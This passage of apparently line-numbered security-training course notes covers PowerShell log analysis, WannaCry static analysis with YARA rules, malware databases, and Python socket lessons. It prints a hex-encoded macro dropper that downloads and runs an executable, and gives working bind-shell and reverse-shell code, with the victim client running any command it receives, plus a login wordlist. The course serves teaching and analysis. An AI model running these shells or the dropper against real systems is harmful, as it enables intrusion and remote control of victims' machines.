3115To dump the event log, you can use the Get-EventLog and the Export-Clixml cmdlets if you are working with a traditional event log such as the Security, Application, or System event logs.
3116If you need to work with one of the trace logs, use the Get-WinEvent and the Export-Clixml cmdlets.
3117
3118---------------------------Type This-----------------------------------
3119
3120Get-EventLog -LogName application | Export-Clixml Applog.xml
3121
3122type .\Applog.xml
3123
3124$logs = "system","application","security"
3125-----------------------------------------------------------------------
3126
3127The % symbol is an alias for the Foreach-Object cmdlet. It is often used when working interactively from the Windows PowerShell console
3128
3129---------------------------Type This-----------------------------------
3130
3131$logs | % { get-eventlog -LogName $_ | Export-Clixml "$_.xml" }
3132-----------------------------------------------------------------------
3133
3134
3135
3136Step 2: Import the event log of interest
3137----------------------------------------
3138To parse the event logs, use the Import-Clixml cmdlet to read the stored XML files.
3139Store the results in a variable.
3140Let's take a look at the cmdlets Where-Object, Group-Object, and Select-Object.
3141
3142The following two commands first read the exported security log contents into a variable named $seclog, and then the five oldest entries are obtained.
3143
3144---------------------------Type This-----------------------------------
3145
3146$seclog = Import-Clixml security.xml
3147
3148$seclog | select -Last 5
3149-----------------------------------------------------------------------
3150
3151
3152Cool trick from one of our students named Adam. This command allows you to look at the logs for the last 24 hours:
3153
3154---------------------------Type This-----------------------------------
3155
3156Get-EventLog Application -After (Get-Date).AddDays(-1)
3157-----------------------------------------------------------------------
3158
3159You can use '-after' and '-before' to filter date ranges
3160
3161One thing you must keep in mind is that once you export the security log to XML, it is no longer protected by anything more than the NTFS and share permissions that are assigned to the location where you store everything, so keep the exported files somewhere with equally restrictive permissions.
3162By default, an ordinary user does not have permission to read the security log.
3163
3164
3165Step 3: Drill into a specific entry
3166-----------------------------------
3167To view the entire contents of a specific event log entry, choose that entry, send the results to the Format-List cmdlet, and choose all of the properties.
3168
3169---------------------------Type This-----------------------------------
3170
3171$seclog | select -first 1 | fl *
3172-----------------------------------------------------------------------
3173
3174The message property contains the SID, account name, user domain, and privileges that are assigned for the new login.
3175
3176---------------------------Type This-----------------------------------
3177
3178($seclog | select -first 1).message
3179
3180(($seclog | select -first 1).message).gettype()
3181
3182-----------------------------------------------------------------------
3183
3184
3185In the *nix world you often want a count of something (wc -l).
3186How often is the SeSecurityPrivilege privilege mentioned in the message property?
3187To obtain this information, pipe the contents of the security log to a Where-Object to filter the events, and then send the results to the Measure-Object cmdlet to determine the number of events:
3188
3189---------------------------Type This-----------------------------------
3190
3191$seclog | ? { $_.message -match 'SeSecurityPrivilege'} | measure
3192
3193-----------------------------------------------------------------------
3194
3195To see which event IDs the entries mentioning SeSecurityPrivilege come from, use Group-Object to group the matches by the EventID property.
3196
3197---------------------------Type This-----------------------------------
3198
3199$seclog | ? { $_.message -match 'SeSecurityPrivilege'} | group eventid
3200-----------------------------------------------------------------------
3201
3202Because importing the event log into a variable from the stored XML results in a collection of event log entries, it means that the count property is also present.
3203Use the count property to determine the total number of entries in the event log.
3204
3205---------------------------Type This-----------------------------------
3206
3207$seclog.Count
3208-----------------------------------------------------------------------
3209
3210
3211
3212
3213
3214
3215############################
3216# Simple Log File Analysis #
3217############################
3218
3219
3220You'll need to create the directory c:\ps and download the sample IIS log http://pastebin.com/raw.php?i=LBn64cyA
3221
3222---------------------------Type This-----------------------------------
3223
3224mkdir c:\ps
3225cd c:\ps
3226(new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=LBn64cyA", "c:\ps\u_ex1104.log")
3227-----------------------------------------------------------------------
3228
3229
3230
3231
3232
3233
3234
3235
3236###############################################
3237# Intrusion Analysis Using Windows PowerShell #
3238###############################################
3239
3240Download sample file http://pastebin.com/raw.php?i=ysnhXxTV into the c:\ps directory
3241
3242
3243
3244
3245---------------------------Type This-----------------------------------
3246
3247(new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=ysnhXxTV", "c:\ps\CiscoLogFileExamples.txt")
3248
3249Select-String 192.168.208.63 .\CiscoLogFileExamples.txt
3250
3251-----------------------------------------------------------------------
3252
3253
3254
3255The Select-String cmdlet searches for text and text patterns in input strings and files. You can use it like Grep in UNIX and Findstr in Windows.
3256
3257---------------------------Type This-----------------------------------
3258
3259Select-String 192.168.208.63 .\CiscoLogFileExamples.txt | select line
3260
3261-----------------------------------------------------------------------
3262
3263
3264
3265To see how many connections are made when analyzing a single host, the output from that can be piped to another command: Measure-Object.
3266
3267---------------------------Type This-----------------------------------
3268
3269Select-String 192.168.208.63 .\CiscoLogFileExamples.txt | select line | Measure-Object
3270-----------------------------------------------------------------------
3271
3272
3273
3274To select all IP addresses in the file expand the matches property, select the value, get unique values and measure the output.
3275
3276---------------------------Type This-----------------------------------
3277
3278Select-String "\b(?:\d{1,3}\.){3}\d{1,3}\b" .\CiscoLogFileExamples.txt | select -ExpandProperty matches | select -ExpandProperty value | Sort-Object -Unique | Measure-Object
3279-----------------------------------------------------------------------
3280
3281
3282
3283Removing Measure-Object shows all the individual IPs instead of just the count of the IP addresses. The Measure-Object command counts the IP addresses.
3284
3285---------------------------Type This-----------------------------------
3286
3287Select-String "\b(?:\d{1,3}\.){3}\d{1,3}\b" .\CiscoLogFileExamples.txt | select -ExpandProperty matches | select -ExpandProperty value | Sort-Object -Unique
3288-----------------------------------------------------------------------
3289
3290
3291To determine which IP addresses communicate the most, drop the last two commands and keep the matched values. Then pipe the output to group, which groups identical IP addresses (value), and sort the groups with the Sort-Object alias: sort count –des.
3292This lists the IP addresses with their counts in descending order and writes the output to the shell.
3293
3294---------------------------Type This-----------------------------------
3295
3296Select-String "\b(?:\d{1,3}\.){3}\d{1,3}\b" .\CiscoLogFileExamples.txt | select -ExpandProperty matches | select value | group value | sort count -des
3297-----------------------------------------------------------------------
3298
3299
3300
3301
3302
3303
3304##############################################
3305# Parsing Log files using windows PowerShell #
3306##############################################
3307
3308Download the sample IIS log http://pastebin.com/LBn64cyA
3309
3310---------------------------Type This-----------------------------------
3311
3312(new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=LBn64cyA", "c:\ps\u_ex1104.log")
3313
3314Get-Content ".\*log" | ? { ($_ | Select-String "WebDAV")}
3315-----------------------------------------------------------------------
3316
3317
3318
3319The above command would give us all the WebDAV requests.
3320
3321To filter this to a particular user name, use the below command:
3322
3323---------------------------Type This-----------------------------------
3324
3325Get-Content ".\*log" | ? { ($_ | Select-String "WebDAV") -and ($_ | Select-String "OPTIONS")}
3326-----------------------------------------------------------------------
3327
3328
3329
3330Some other filters you will commonly need:
3331
3332For Outlook Web Access : Replace WebDAV with OWA
3333
3334For EAS : Replace WebDAV with Microsoft-server-activesync
3335
3336For ECP : Replace WebDAV with ECP
3337
3338
3339
3340To count the EWS requests for a given user, run the command below ("Useralias" stands for the user alias you are looking for):
3341
3342---------------------------Type This-----------------------------------
3343
3344(Get-Content ".\*log" | ? { ($_ | Select-String "WebDAV") -and ($_ | Select-String "Useralias")}).count
3345-----------------------------------------------------------------------
3346
3347
3348
3349
3350
3351
3352
3353################################
3354# Good references for WannaCry #
3355################################
3356
3357References:
3358
3359https://gist.github.com/rain-1/989428fa5504f378b993ee6efbc0b168
3360https://securingtomorrow.mcafee.com/executive-perspectives/analysis-wannacry-ransomware-outbreak/
3361https://joesecurity.org/reports/report-db349b97c37d22f5ea1d1841e3c89eb4.html
3362
3363
3364
3365############################
3366# Download the Analysis VM #
3367############################
3368https://s3.amazonaws.com/infosecaddictsvirtualmachines/InfoSecAddictsVM.zip
3369user: infosecaddicts
3370pass: infosecaddicts
3371
3372
3373
3374- Log in to your Ubuntu system with the username 'infosecaddicts' and the password 'infosecaddicts'.
3375
3376
3377
3378
3379
3380
3381################
3382# The Scenario #
3383################
3384You've come across a file that has been flagged by one of your security products (AV Quarantine, HIPS, Spam Filter, Web Proxy, or digital forensics scripts).
3385
3386
3387The fastest thing you can do is perform static analysis.
3388
3389---------------------------Type This-----------------------------------
3390
3391sudo pip install olefile
3392 strategicsec
3393
3394mkdir ~/Desktop/oledump
3395
3396cd ~/Desktop/oledump
3397
3398wget http://didierstevens.com/files/software/oledump_V0_0_22.zip
3399
3400unzip oledump_V0_0_22.zip
3401
3402wget https://s3.amazonaws.com/infosecaddictsfiles/064016.zip
3403
3404unzip 064016.zip
3405 infected
3406
3407python oledump.py 064016.doc
3408
3409python oledump.py 064016.doc -s A4 -v
3410
3411- From this we can see this Word doc contains an embedded file called editdata.mso which contains seven data streams.
3412- Three of the data streams are flagged as macros: A3:'VBA/Module1′, A4:'VBA/Module2′, A5:'VBA/ThisDocument'.
3413
3414
3415python oledump.py 064016.doc -s A5 -v
3416
3417- As far as I can tell, VBA/Module2 does absolutely nothing. These are nonsensical functions designed to confuse heuristic scanners.
3418
3419
3420python oledump.py 064016.doc -s A3 -v
3421-----------------------------------------------------------------------
3422
3423- Look for "GVhkjbjv" and you should see:
3424
3425636D64202F4B20706F7765727368656C6C2E657865202D457865637574696F6E506F6C69637920627970617373202D6E6F70726F66696C6520284E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E74292E446F776E6C6F616446696C652827687474703A2F2F36322E37362E34312E31352F6173616C742F617373612E657865272C272554454D50255C4A494F696F646668696F49482E63616227293B20657870616E64202554454D50255C4A494F696F646668696F49482E636162202554454D50255C4A494F696F646668696F49482E6578653B207374617274202554454D50255C4A494F696F646668696F49482E6578653B
3426
3427- Take that long blob that starts with 636D and finishes with 653B and paste it into the hex-to-ASCII converter below to read what the macro carries (read it, don't run it):
3428http://www.rapidtables.com/convert/number/hex-to-ascii.htm
3429
3430
3431
3432###################
3433# Static Analysis #
3434###################
3435
3436- After logging in, please open a terminal window and type the following commands:
3437
3438---------------------------Type This-----------------------------------
3439
3440cd Desktop/
3441
3442wget https://s3.amazonaws.com/infosecaddictsfiles/wannacry.zip
3443
3444unzip wannacry.zip
3445 infected
3446
3447file wannacry.exe
3448
3449mv wannacry.exe malware.pdf
3450
3451file malware.pdf
3452
3453mv malware.pdf wannacry.exe
3454
3455hexdump -n 2 -C wannacry.exe
3456-----------------------------------------------------------------------
3457
3458
3459
3460
3461***What is '4d 5a' or 'MZ'***
3462Reference:
3463http://www.garykessler.net/library/file_sigs.html
3464
3465
3466
3467---------------------------Type This-----------------------------------
3468
3469
3470objdump -x wannacry.exe
3471
3472strings wannacry.exe
3473
3474strings --all wannacry.exe | head -n 6
3475
3476strings wannacry.exe | grep -i dll
3477
3478strings wannacry.exe | grep -i library
3479
3480strings wannacry.exe | grep -i reg
3481
3482strings wannacry.exe | grep -i key
3483
3484strings wannacry.exe | grep -i rsa
3485
3486strings wannacry.exe | grep -i open
3487
3488strings wannacry.exe | grep -i get
3489
3490strings wannacry.exe | grep -i mutex
3491
3492strings wannacry.exe | grep -i irc
3493
3494strings wannacry.exe | grep -i join
3495
3496strings wannacry.exe | grep -i admin
3497
3498strings wannacry.exe | grep -i list
3499
3500-----------------------------------------------------------------------
3501
3502
3503
3504
3505
3506
3507
3508
3509
3510
3511Hmmmmm.......what's the latest thing in the news - oh yeah "WannaCry"
3512
3513Quick Google search for "wannacry ransomware analysis"
3514
3515
3516Reference
3517https://securingtomorrow.mcafee.com/executive-perspectives/analysis-wannacry-ransomware-outbreak/
3518
3519- Yara Rule -
3520
3521
3522Strings:
3523$s1 = "Ooops, your files have been encrypted!" wide ascii nocase
3524$s2 = "Wanna Decryptor" wide ascii nocase
3525$s3 = ".wcry" wide ascii nocase
3526$s4 = "WANNACRY" wide ascii nocase
3527$s5 = "WANACRY!" wide ascii nocase
3528$s7 = "icacls . /grant Everyone:F /T /C /Q" wide ascii nocase
3529
3530
3531
3532
3533
3534
3535
3536
3537Ok, let's look for the individual strings
3538
3539---------------------------Type This-----------------------------------
3540
3541
3542strings wannacry.exe | grep -i ooops
3543
3544strings wannacry.exe | grep -i wanna
3545
3546strings wannacry.exe | grep -i wcry
3547
3548strings wannacry.exe | grep -i wannacry
3549
3550strings wannacry.exe | grep -i wanacry **** Matches $s5, hmmm.....
3551
3552-----------------------------------------------------------------------
3553
3554
3555
3556
3557
3558
3559####################################
3560# Tired of GREP - let's try Python #
3561####################################
3562Decided to make my own script for this kind of stuff in the future.
3563
3564Reference1:
3565https://s3.amazonaws.com/infosecaddictsfiles/analyse_malware.py
3566
3567This is a really good script for the basics of static analysis
3568
3569Reference:
3570https://joesecurity.org/reports/report-db349b97c37d22f5ea1d1841e3c89eb4.html
3571
3572
3573This is really good for showing some good signatures to add to the Python script
3574
3575
3576Here is my own script using the signatures (started this yesterday, but still needs work):
3577https://pastebin.com/guxzCBmP
3578
3579
3580---------------------------Type This-----------------------------------
3581
3582
3583sudo apt install -y python-pefile
3584 strategicsec
3585
3586
3587
3588wget https://pastebin.com/raw/guxzCBmP
3589
3590
3591mv guxzCBmP am.py
3592
3593
3594vi am.py
3595
3596python am.py wannacry.exe
3597
3598-----------------------------------------------------------------------
3599
3600
3601
3602
3603
3604
3605
3606
3607
3608##############
3609# Yara Ninja #
3610##############
3611
3612---------------------------Type This-----------------------------------
3613
3614cd ~/Desktop
3615
3616sudo apt-get remove -y yara
3617 infosecaddicts
3618
3619sudo apt -y install libtool
3620 strategicsec
3621
3622wget https://github.com/VirusTotal/yara/archive/v3.6.0.zip
3623
3624
3625unzip v3.6.0.zip
3626
3627cd yara-3.6.0
3628
3629./bootstrap.sh
3630
3631./configure
3632
3633make
3634
3635sudo make install
3636 strategicsec
3637
3638yara -v
3639
3640cd ~/Desktop
3641-----------------------------------------------------------------------
3642
3643
3644
3645
3646NOTE:
3647McAfee is giving these yara rules - so add them to the hashes.txt file
3648
3649Reference:
3650https://securingtomorrow.mcafee.com/executive-perspectives/analysis-wannacry-ransomware-outbreak/
3651
3652----------------------------------------------------------------------------
// WannaCry string signature as published in the McAfee analysis referenced
// above. Matching any one string is enough to fire (see condition).
rule wannacry_1 : ransom
{
    meta:
        author = "Joshua Cannell"
        description = "WannaCry Ransomware strings"
        weight = 100
        date = "2017-05-12"

    strings:
        // Ransom-note and branding text. "wide ascii" matches both the
        // two-byte-per-character and the one-byte encoding of each string,
        // and "nocase" makes the match case-insensitive.
        $s1 = "Ooops, your files have been encrypted!" wide ascii nocase
        $s2 = "Wanna Decryptor" wide ascii nocase
        $s3 = ".wcry" wide ascii nocase
        $s4 = "WANNACRY" wide ascii nocase
        $s5 = "WANACRY!" wide ascii nocase
        // There is no $s6 in the published rule; the numbering gap is original.
        // $s7 is the icacls command line that grants Everyone full control.
        $s7 = "icacls . /grant Everyone:F /T /C /Q" wide ascii nocase

    condition:
        // Any single string is enough. Short tokens such as ".wcry" can also
        // occur in benign files (e.g. documents discussing WannaCry), so
        // confirm a hit with hashes or behaviour before acting on it.
        any of them
}
3672
3673----------------------------------------------------------------------------
// Second WannaCry signature from the same McAfee post: matches on the file
// names of the per-language ransom message resources (msg/m_<language>.wnry).
rule wannacry_2{
    meta:
        author = "Harold Ogden"
        description = "WannaCry Ransomware Strings"
        date = "2017-05-12"
        weight = 100

    strings:
        // No modifiers on these strings: plain one-byte, case-sensitive matches.
        $string1 = "msg/m_bulgarian.wnry"
        $string2 = "msg/m_chinese (simplified).wnry"
        $string3 = "msg/m_chinese (traditional).wnry"
        $string4 = "msg/m_croatian.wnry"
        $string5 = "msg/m_czech.wnry"
        $string6 = "msg/m_danish.wnry"
        $string7 = "msg/m_dutch.wnry"
        $string8 = "msg/m_english.wnry"
        $string9 = "msg/m_filipino.wnry"
        $string10 = "msg/m_finnish.wnry"
        $string11 = "msg/m_french.wnry"
        $string12 = "msg/m_german.wnry"
        $string13 = "msg/m_greek.wnry"
        $string14 = "msg/m_indonesian.wnry"
        $string15 = "msg/m_italian.wnry"
        $string16 = "msg/m_japanese.wnry"
        $string17 = "msg/m_korean.wnry"
        $string18 = "msg/m_latvian.wnry"
        $string19 = "msg/m_norwegian.wnry"
        $string20 = "msg/m_polish.wnry"
        $string21 = "msg/m_portuguese.wnry"
        $string22 = "msg/m_romanian.wnry"
        $string23 = "msg/m_russian.wnry"
        $string24 = "msg/m_slovak.wnry"
        $string25 = "msg/m_spanish.wnry"
        $string26 = "msg/m_swedish.wnry"
        $string27 = "msg/m_turkish.wnry"
        $string28 = "msg/m_vietnamese.wnry"


    condition:
        // Any one of the $string* identifiers is enough to fire.
        any of ($string*)
}
3715----------------------------------------------------------------------------
3716
3717
3718#######################
3719# External DB Lookups #
3720#######################
3721
3722Creating a malware database (sqlite)
3723
3724---------------------------Type This-----------------------------------
3725
# python-simplejson is the Python 2 package (the -dbg symbols are not needed to
# run the script); the next line is the sudo password typed at the prompt
sudo apt install -y python-simplejson python-simplejson-dbg
 strategicsec



# third-party script fetched straight from a GitHub raw URL and run as-is:
# read it before executing it on your analysis box
wget https://raw.githubusercontent.com/mboman/mart/master/bin/avsubmit.py



# NOTE(review): the name suggests this submits the sample to external AV /
# sandbox services, which discloses the file (and that you have it) to third
# parties -- confirm what -e does in the script before using it on anything
# sensitive
python avsubmit.py -f wannacry.exe -e
3737-----------------------------------------------------------------------
3738
3739Analysis of the file can be found at:
3740http://www.threatexpert.com/report.aspx?md5=84c82835a5d21bbcf75a61706d8ab549
3741
3742
3743
3744
3745
3746
3747
3748
3749
3750###############################
3751# Creating a Malware Database #
3752###############################
3753Creating a malware database (mysql)
3754-----------------------------------
3755- Step 1: Installing MySQL database
3756- Run the following command in the terminal:
3757
3758---------------------------Type This-----------------------------------
3759
sudo apt install -y mysql-server
 strategicsec

- Step 2: Installing Python MySQLdb module
- Run the following command in the terminal:

# build-dep needs deb-src entries in the apt sources; it can be skipped when
# the binary package below installs cleanly
sudo apt-get build-dep python-mysqldb
 strategicsec

sudo apt install -y python-mysqldb
 strategicsec

- Step 3: Logging in
- Run the following command in the terminal:

# lab-only root password; the DB holds malware hashes and metadata, so on a
# shared box use a dedicated low-privilege DB user instead of root
mysql -u root -p (set a password of 'malware')

- Then create one database by running following command:

create database malware;

exit;

# third-party script, fetched unreviewed from GitHub: read it before running
wget https://raw.githubusercontent.com/dcmorton/MalwareTools/master/mal_to_db.py

# the DB credentials end up in clear text inside the script; keep it out of
# version control / world-readable locations
vi mal_to_db.py (fill in database connection information)

# -i: create the schema (the 'files' table checked below)
python mal_to_db.py -i

------- check it to see if the files table was created ------

mysql -u root -p
 malware

show databases;

use malware;

show tables;

describe files;

exit;

---------------------------------


- Now add the malicious file to the DB

# -u: insert/update the record for the sample (hashes etc.)
python mal_to_db.py -f wannacry.exe -u



- Now check to see if it is in the DB

mysql -u root -p
 malware

mysql> use malware;

select id,md5,sha1,sha256,time FROM files;

mysql> quit;
3823
3824
3825--------------------------------------------------------------------------------------
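# Let the test listener through the host firewall without discarding every
# other rule: `iptables -F` flushes ALL chains and leaves the host unprotected
# until the rules are reloaded. Insert one ACCEPT for the port instead
# (delete it again with the same command and -D instead of -I when done).
$ sudo /sbin/iptables -I INPUT -p tcp --dport 1234 -j ACCEPT

# listen on TCP/1234 (-l listen, -v verbose, -p port)
$ ncat -l -v -p 1234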
3829
3830
3831
3832
3833--open another terminal--
python
# Python 2 interactive session talking to the ncat listener started above
# (str payloads; Python 3 would need b'Hello, world' and print(...)).

>>> import socket
>>> s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
>>> s.connect(('localhost', 1234))
>>> s.send('Hello, world')
>>> data = s.recv(1024)   # blocks until the ncat side types a reply (or closes)
>>> s.close()

>>> print 'Received', data
3844
3845
3846
3847
3848
3849
3850########################################
3851# Lesson 18: TCP Client and TCP Server #
3852########################################
3853
3854---------------------------Type This-----------------------------------
3855
3856vi tcpclient.py
3857
3858
3859---------------------------Paste This-----------------------------------
3860
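#!/usr/bin/python
# tcpclient.py
#
# Minimal TCP client for Lesson 18 (Python 2 syntax, like the rest of these
# notes): connect to the tcpserver.py listener on 127.0.0.1:1337, send
# "Hello\n" and print whatever the server answers.

import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
hostport = ("127.0.0.1", 1337)
try:
    s.connect(hostport)
    # sendall() keeps writing until the whole message is out; a bare send()
    # may return after transmitting only part of it
    s.sendall("Hello\n")
    # the server sends one short line and closes, so a single recv is enough
    buf = s.recv(1024)
    print "Received", buf
finally:
    # release the socket even if the connection was refused
    s.close()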
3872
3873
3874
3875
3876
3877
3878
3879
3880---------------------------Type This-----------------------------------
3881
3882vi tcpserver.py
3883
3884
3885
3886---------------------------Paste This-----------------------------------
3887
3888
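#!/usr/bin/python
# tcpserver.py
#
# Minimal TCP server for Lesson 18 (Python 2 syntax): accept one connection at
# a time on port 1337 and answer "Server ID 1\n" only to a client that sends
# exactly "Hello\n". Stop it with Ctrl-C.

import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Without SO_REUSEADDR a restart right after a client disconnect fails with
# "Address already in use" while the old connection sits in TIME_WAIT.
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# "" binds every interface, so the port is reachable from the network, not
# just from this host; use ("127.0.0.1", 1337) if only the local client
# should be able to reach it.
hostport = ("", 1337)
s.bind(hostport)
s.listen(10)
try:
    while 1:
        cli, addr = s.accept()
        print "Connection from", addr
        try:
            buf = cli.recv(1024)
            print "Received", buf
            # exact match: "Hello" without the newline gets no reply
            if buf == "Hello\n":
                cli.sendall("Server ID 1\n")
        finally:
            # close the client even if recv/send raised, so the loop keeps serving
            cli.close()
finally:
    s.close()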
3906
3907
3908
3909
3910
3911
3912---------------------------Type This-----------------------------------
3913
3914
3915python tcpserver.py
3916
3917
3918--open another terminal--
3919python tcpclient.py
3920
3921
3922########################################
3923# Lesson 19: UDP Client and UDP Server #
3924########################################
3925
3926---------------------------Type This-----------------------------------
3927
3928vi udpclient.py
3929
3930
3931
3932
3933---------------------------Paste This-----------------------------------
3934
3935
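#!/usr/bin/python
# udpclient.py
#
# Minimal UDP client for Lesson 19 (Python 2 syntax): send "Hello\n" to
# udpserver.py on 127.0.0.1:1337 and print the reply.

import socket

s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
hostport = ("127.0.0.1", 1337)
# UDP gives no delivery guarantee: if the server is not running (or the
# datagram is dropped) recv() would block forever, so give up after 5 s.
s.settimeout(5)
try:
    s.sendto("Hello\n", hostport)
    buf = s.recv(1024)
    print buf
except socket.timeout:
    print "No reply from", hostport
finally:
    s.close()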
3946
3947
3948
3949
3950
3951
3952
3953---------------------------Type This-----------------------------------
3954
3955
3956vi udpserver.py
3957
3958
3959
3960---------------------------Paste This-----------------------------------
3961
3962
3963
#!/usr/bin/python
# udpserver.py
#
# Minimal UDP responder for Lesson 19 (Python 2 syntax). Listens on
# 127.0.0.1:1337 forever: every datagram received is printed, and a datagram
# that is exactly "Hello\n" is answered with "Server ID 1\n" to its sender.

import socket

GREETING = "Hello\n"
REPLY = "Server ID 1\n"

s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
hostport = ("127.0.0.1", 1337)
s.bind(hostport)

while True:
    datagram, sender = s.recvfrom(1024)
    print datagram
    if datagram == GREETING:
        s.sendto(REPLY, sender)
3977
3978
3979
3980
3981---------------------------Type This-----------------------------------
3982
3983
3984python udpserver.py
3985
3986
3987--open another terminal--
3988python udpclient.py
3989
3990
3991
3992######################################
3993# Lesson 20: Bind and Reverse Shells #
3994######################################
3995
3996---------------------------Type This-----------------------------------
3997
3998vi simplebindshell.py
3999
4000---------------------------Paste This-----------------------------------
4001
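#!/usr/bin/python
# simplebindshell.py -- Lesson 20 bind shell (Python 2 syntax)
#
# Listens on TCP/31337 on every interface, accepts ONE client, points this
# process's stdin/stdout/stderr at that connection and replaces itself with
# /bin/sh, so whoever connects (nc TARGETIP 31337) gets an unauthenticated
# shell as the user that ran this script. Lab use only: anyone who can reach
# the port gets the shell. (Shebang fixed to /usr/bin/python, matching the
# other listings in these notes.)
import os, sys, socket

ls = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print '-Creating socket..'
port = 31337
try:
    ls.bind(('', port))
    print '-Binding the port on', port
    ls.listen(1)
    print '-Listening, waiting for connection...'
    # accept() blocks here until the client arrives
    (conn, addr) = ls.accept()
    print '-Connection from', addr
    cli = conn.fileno()
    # After these dup2() calls every print goes to the client instead of the
    # local terminal, which is why all progress messages come before them.
    print '-Redirecting shell (in, out, err)... Done!'
    os.dup2(cli, 0)
    os.dup2(cli, 1)
    os.dup2(cli, 2)
    arg0 = '/bin/sh'
    # '-a' (allexport) is what the original notes pass; it only affects
    # variable export. If an interactive prompt is wanted, '-i' is the usual
    # choice -- confirm which was intended.
    arg1 = '-a'
    args = [arg0] + [arg1]
    # execv replaces this process with the shell; nothing below runs on success
    os.execv(arg0, args)
except socket.error:
    # bind/listen/accept failed (e.g. port already in use): 'conn' may never
    # have been assigned, so close the listening socket, which always exists
    print 'fail\n'
    ls.close()
    sys.exit(1)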
4032
4033
4034
4035
4036
4037
4038---------------------------Type This-----------------------------------
4039
# from the attacker box: connect to the bind shell (replace TARGETIP). There is
# no authentication -- whoever reaches the port gets the shell.
nc TARGETIP 31337
4041
4042
4043
4044---------------------
- Preparing the listener for a reverse shell (this ncat listener is the side the shell calls back to, i.e. the attacker box)
# listener the reverse shell will call back to: -l listen, -v verbose, -p 4444
$ ncat -lvp 4444
4047
4048
4049
4050--open another terminal--
# third-party reverse-shell script fetched as-is: read it before running it
wget https://www.trustedsec.com/files/simple_py_shell.py

# opened for editing, presumably to set the call-back host/port to the ncat
# listener above -- confirm the variable names in the script
vi simple_py_shell.py
4054
4055
4056
4057
4058
4059
4060-------------------------------
4061Tricky shells
4062
4063Reference:
4064http://securityweekly.com/2011/10/python-one-line-shell-code.html
4065http://resources.infosecinstitute.com/creating-undetectable-custom-ssh-backdoor-python-z/
4066
4067
4068
4069--------------------------------------------------------------------------------------------------------------
4070
4071
4072# Reverse Shell in Python 2.7 #
4073###############################
4074
4075We'll create 2 python files. One for the server and one for the client.
4076
4077- Below is the python code that is running on victim/client Windows machine:
4078
4079---------------------------------------------------------------------
4080
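# Client
#
# Runs on the victim (Windows) host: connects back to the listener below, then
# executes every line it receives as a shell command and returns the output.
# Python 2 syntax (str sockets). Lab use only: the channel is unencrypted and
# unauthenticated, so anyone who can reach the listener's port can hand this
# host commands.

import socket     # For Building TCP Connection
import subprocess # To start the shell in the system

def connect():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('192.168.243.150', 8080))  # listener IP/port (server.py)

    while True:  # keep receiving commands
        command = s.recv(1024)

        # recv() returns '' when the server side closes; without this check the
        # loop would spin forever running empty commands. 'terminate' is a
        # substring test, so any command containing that word also ends the
        # session.
        if not command or 'terminate' in command:
            s.close()  # close the socket
            break

        # communicate() drains stdout and stderr together and waits for exit;
        # reading stdout.read() then stderr.read() can deadlock when a command
        # writes a lot to stderr before finishing stdout.
        CMD = subprocess.Popen(command, shell=True, stdin=subprocess.PIPE,
                               stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        out, err = CMD.communicate()
        output = out + err  # result, plus the error in case you mistyped a command
        # a command with no output (e.g. "cd") would otherwise leave the
        # server's recv() waiting forever, so always send at least a newline
        s.sendall(output if output else '\n')

def main():
    connect()
main()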
4107
4108
4109----------------------------------------------------------------------------------------------------------------
4110
4111- Below is the code that we should run on server unit, in our case strategicsec Ubuntu machine ( Ubuntu IP: 192.168.243.150 )
4112
4113---------------------------------------------------------------------------
4114
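# Server
#
# Runs on the attacker (Ubuntu 192.168.243.150) host: waits for the client to
# call back on TCP/8080 and then relays typed commands to it. Python 2 syntax
# (raw_input, print statement).

import socket  # For Building TCP Connection


def connect():

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # allow an immediate restart while the previous connection is in TIME_WAIT
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    s.bind(("192.168.243.150", 8080))
    s.listen(1)
    conn, addr = s.accept()
    print '[+] We got a connection from: ', addr


    while True:
        command = raw_input("Shell> ")

        if 'terminate' in command:
            # must be spelled exactly as the client tests for it: the original
            # sent 'termminate', which the client then ran as a command
            conn.send('terminate')
            conn.close()  # close the connection with host (was conn.cloe(): AttributeError)
            break

        elif command:
            conn.send(command)  # send command
            # one recv of up to 1024 bytes: longer output shows up on the
            # following prompts, and a command that produces no output leaves
            # this recv() waiting until something arrives
            print conn.recv(1024)
        # an empty line is ignored: send('') transmits nothing, and the recv()
        # after it would block forever

    s.close()

def main():
    connect()
main()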
4144
4145--------------------------------------------------------------------------
4146
4147- First run server.py code from Ubuntu machine. From command line type:
4148
4149---------------------------Type This-----------------------------------
4150
# on the Ubuntu listener host; start it BEFORE client.py so the call-back succeeds
python server.py
4152
4153
4154- then check if 8080 port is open, and if we are listening on 8080:
4155
4156
# expect a LISTEN entry on 192.168.243.150:8080 owned by the python process
# (-p shows the owning PID only for sockets you own unless run with sudo)
netstat -antp | grep "8080"
4158
4159
4160--------------------------
4161
4162- Then on victim ( Windows ) unit run client.py code.
4163
4164
4165- Connection will be established, and you will get a shell on Ubuntu:
4166
4167infosecaddicts@ubuntu:~$ python server.py
4168[+] We got a connection from: ('192.168.243.1', 56880)
4169Shell> arp -a
4170
4171Shell> ipconfig
4172
4173Shell> dir
4174-------------------------------------------------------------------------------------------------------------------------
4175
4176
4177So, let's start with some lab fun (just a little bit)...lol. Here are the instructions for connecting to the VPN:
4178https://s3.amazonaws.com/infosecaddictsfiles/InfoSecAddicts-VPN-2018-Info.pdf
4179user: userX (user1, user2, user3, user4, user5, user6)
4180pass: --------
4181
4182
4183
4184
4185
4186
4187
4188
4189
4190#########################
4191# Building a quick list #
4192#########################
4193
4194---------------------------Type This-----------------------------------
4195
# Build the small username/password wordlist (~/list.txt) used by the hydra
# and Metasploit login modules later in these notes. Each name is appended as
# its own line; running this twice appends the same names again.
cd ~
printf '%s\n' bob jim joe tim admin hello rob test aaaaaa larry mario jason john >> list.txt
4210
4211-----------------------------------------------------------------------
